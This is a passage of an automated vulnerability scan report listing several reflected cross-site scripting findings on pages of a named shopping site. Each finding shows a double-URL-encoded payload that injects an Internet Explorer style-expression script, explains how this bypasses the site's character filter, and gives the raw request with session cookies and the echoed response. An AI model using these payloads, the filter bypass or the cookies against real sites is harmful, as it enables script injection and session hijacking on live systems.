The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 440f0'style='x:expression(alert(1))'ca6e7ba9e71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_returns_exchanges?440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:54 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 772670871:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=969
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 35161


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Returns & Exchanges</title>


<script language='JavaScript' type='text/javascript'>window.status='L
...[SNIP]...
http://www.turnerlicensing.com/s.nl?it=I&id=81&440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71=1&440f0%27style%3d%27x%3aexpression%28alert%281%29%29%27ca6e7ba9e71=1&440f0'style='x:expression(alert(1))'ca6e7ba9e71=1&fromsla=T'>
...[SNIP]...

1.146. http://www.turnerlicensing.com/turner_shipping_information [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_shipping_information

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 88d10'style='x:expression(alert(1))'7e7db22553f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_shipping_information?88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:54 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1114207881:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=994
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 36834


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Shipping Information</title>


<script language='JavaScript' type='text/javascript'>window.status='
...[SNIP]...
http://www.turnerlicensing.com/s.nl?it=I&id=82&88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f=1&88d10%27style%3d%27x%3aexpression%28alert%281%29%29%277e7db22553f=1&88d10'style='x:expression(alert(1))'7e7db22553f=1&fromsla=T'>
...[SNIP]...

1.147. http://www.turnerlicensing.com/turner_sitemap [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_sitemap

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99d68'style='x:expression(alert(1))'12a287f255c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_sitemap?99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:57 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 670307848:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=913
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 79081


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Sitemap</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?it=I&id=83&99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c=1&fromsla=T&99d68'style='x:expression(alert(1))'12a287f255c=1&99d68%27style%3d%27x%3aexpression%28alert%281%29%29%2712a287f255c=1'>
...[SNIP]...

1.148. http://www.turnerlicensing.com/turner_tax_information [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_tax_information

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5957e'style='x:expression(alert(1))'a5b65f5204 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_tax_information?5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:55 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 670307546:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=914
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33697


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Tax Information</title>


<script language='JavaScript' type='text/javascript'>window.status='Loadi
...[SNIP]...
='http://www.turnerlicensing.com/s.nl?it=I&id=84&5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204=1&5957e%27style%3d%27x%3aexpression%28alert%281%29%29%27a5b65f5204=1&5957e'style='x:expression(alert(1))'a5b65f5204=1&fromsla=T'>
...[SNIP]...

1.149. http://www.turnerlicensing.com/turner_wall_calendars [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_wall_calendars

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 997ed'style='x:expression(alert(1))'137726c367f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_wall_calendars?997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:10 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2002011445:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=976
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100700


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wall Calendars</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=338448&997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f=1&997ed'style='x:expression(alert(1))'137726c367f=1&fromsla=T&997ed%27style%3d%27x%3aexpression%28alert%281%29%29%27137726c367f=1'>
...[SNIP]...

Report generated by XSS.CX at Sat Nov 20 20:54:25 CST 2010.